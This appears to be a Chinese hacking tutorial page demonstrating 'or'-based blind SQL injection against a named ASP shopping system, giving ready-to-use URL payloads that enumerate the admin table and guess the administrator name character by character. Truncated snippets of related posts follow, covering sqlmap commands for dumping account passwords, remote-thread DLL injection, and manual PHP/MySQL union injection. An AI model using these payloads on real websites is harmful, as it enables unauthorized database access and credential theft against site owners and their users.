記得一年前火狐有一位朋友問,如果乙個站過濾了and和"'"的話,改怎麼注入啊?當時我隨口說了句"or注入",後來又一次看貼的時候,看到他問我該怎麼利用呢?我就寫了幾個簡單的語句給他,叫他自己變換,他很感激我,還說網上沒有這種方法。我到網上查了查,還真沒有or注入專題呢(or 1=1除外),呵呵,所以,一年後的今天,就有了這篇文章。
我們用雷霆購物系統做or注入演示。我們先用or 1=1和or 1=2來測試是否存在注入點,我們先來看正常頁面的面貌。我們現在用or 1=1測試是否存在注入漏洞。返回的是另外乙個頁面,我們再來測試or 1=2。返回的是正常的頁面,說明猜測正確的時候是錯誤,猜測錯誤的時候是正常,這就是真正的"假是真時真是假",比lake2大哥哥的ip欺騙更經典哦,呵呵。
我們來構造測試語句:
vpro.asp?id=1 or exists(select * from admin)
返回錯誤頁面,說明存在admin表我們來換乙個表試試!
vpro.asp?id=1 or exists(select * from n0h4ck)
說明不存在n0h4ck這個表。
我們繼續來,構造語句
vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的頁面,說明admin表存在admin欄位。
vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的頁面,說明admin表不存在padd欄位。
我們現在開始猜測資料了,
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'
返回or 1=2的頁面,說明admin表admin欄位的第乙個資料的第乙個字元不是"n"。
我們再來
vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'
返回or 1=1的頁面,說明說明admin表admin欄位的第乙個資料的第乙個字元是"a",我們第乙個會想到什麼呢?當然是"admin"啦。
我們用left函式確定一下,
vpro.asp?id=1 or (select left(admin,5) from admin)='admin'
猜測正確,的確是admin,好了,後面的話就不用我說了吧!
SQLmap注入教程
一次sqlmap注入點並且dump出賬號密碼全程 判斷注入點 sqlmap.py u 存在注入url 爆出所有資料庫名字 sqlmap.py u 存在注入url dbs 檢視當前使用賬號 sqlmap.py u 存在注入url current user 1 檢視當前資料庫 sqlmap.py u 存...
程式注入教程集合
遠端執行緒注入dll 遠執行緒注入原理是利用windows 系統中createremotethread 這個api,其中第4個引數是準備執行的執行緒,我們可以將loadlibrary 填入其中,這樣就可以執行遠端程序中的loadlibrary 函式,進而將我們自己準備的dll載入到遠端程序空間中執行...
php mysql手工注入教程
注入點 x and1 1 返回正確 and1 2返回錯誤 說明存在注入點 order by 11 反悔正確 order by 12 返回錯誤 說明存在11個字段 union select 1,2,3,4,5,6,7,8,9,10,11 看清楚那裡是 13 是讓他報錯用的 也可以用and 1 2 報錯...